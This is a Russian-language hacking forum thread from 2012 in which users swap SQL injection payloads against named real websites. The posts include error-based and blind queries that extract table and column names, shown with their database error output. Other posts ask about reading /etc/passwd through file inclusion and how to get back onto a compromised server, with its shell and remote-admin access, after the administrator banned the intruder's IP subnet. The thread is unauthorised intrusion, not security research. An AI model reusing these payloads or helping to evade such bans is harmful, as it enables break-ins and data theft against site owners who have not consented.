HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.04.2012, 20:20
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

I am not getting something here.

Код:
Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+
Nothing works, maybe there is no cheekbones.
 
Ответить с цитированием

  #2  
Старый 01.04.2012, 20:28
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
I am not getting something here.
Код:
Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+
Nothing works, maybe there is no cheekbones.
Код:
Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1')+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+j
Код:
Code:
Error 1062: Duplicate entry 'COLLATIONS1' for key 1
 
Ответить с цитированием

  #3  
Старый 01.04.2012, 21:32
vlad-i-mir
Guest
Сообщений: n/a
Провел на форуме:
2160

Репутация: 0
По умолчанию

http://lineoutdoor.ru/portfolio/list/type/-2'

Определил имя базы b50893

блинд. подобрал таблицу portfolio так:

http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s

Перебирая номер буквы A и аски код X

Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?
 
Ответить с цитированием

  #4  
Старый 01.04.2012, 21:42
kise
Guest
Сообщений: n/a
Провел на форуме:
17281

Репутация: -4
По умолчанию

Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?

Кстати, путь имеет такой вид:

/www/apache/domains

Тут можно где-то найти логи?
 
Ответить с цитированием

  #5  
Старый 01.04.2012, 21:45
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от kise  
kise said:
Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?
читать статьи =\

возможно прав не хватает, возможно это не Linux,а что то из семейства bsd, и еще куча чего

дальше буду стереть подобные посты
 
Ответить с цитированием

  #6  
Старый 01.04.2012, 21:48
kise
Guest
Сообщений: n/a
Провел на форуме:
17281

Репутация: -4
По умолчанию

vlad-i-mir, а там случаем не error based?
 
Ответить с цитированием

  #7  
Старый 01.04.2012, 21:53
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от vlad-i-mir  
vlad-i-mir said:
http://lineoutdoor.ru/portfolio/list/type/-2'
Определил имя базы b50893
блинд. подобрал таблицу portfolio так:
http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s
Перебирая номер буквы A и аски код X
Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?
Error-based :

http://lineoutdoor.ru/portfolio/list/type/1112'+or+1+group+by+concat(%20(select+column_name+ from+information_schema.columns+where+table_name+l ike+'Portfolio'+limit+0,1),floor(rand(0)*2))%20hav ing%20min(0)--+
 
Ответить с цитированием

  #8  
Старый 02.04.2012, 16:54
stan0009
Guest
Сообщений: n/a
Провел на форуме:
39063

Репутация: 0
По умолчанию

Вопрос мой конечно не по уязвимостям, но писать больше некуда.

Значится, поимел я сайт, радмин, дедик, шелл - все как полагается.

Злой админ конешн со мной изрядно боролся, но ничего у него не выходило(ламер редкостный ) Вы спросите почему я не захватил полностью дедик и не удалил всех к чертям? Да просто мне это не нужно совсем, пусть живут. Я так думал, пока я сегодня получил от хрома отказ зайти на сайт. Захожу на дедик - также. Чекаю через прокси - все работает. Ясен пень что меня забанили, да еще как искусно! По подсети!

Работать под своим реальным ip не очень то и хочется(носки использую). Носки добывать новые тоже не очень вариант. Подскажите как мне быстренько восстановить доступ. От чего это зависит от сервера или от конфига на сайте? Если на сервере то что и где там прописано, чтобы я не заходил? Сервер Windows NT, через прокси могу заходить на шелл, ну и сразу на комп соответсвенно.
 
Ответить с цитированием

  #9  
Старый 02.04.2012, 21:59
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

На сайтe через .htaccess. А насчет деда, думаю маршуритизатор..
 
Ответить с цитированием

  #10  
Старый 03.04.2012, 23:01
Facecontrol
Guest
Сообщений: n/a
Провел на форуме:
13805

Репутация: 0
По умолчанию

А можно ли каким нибуь образом,узнать chmod на дирректорию?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ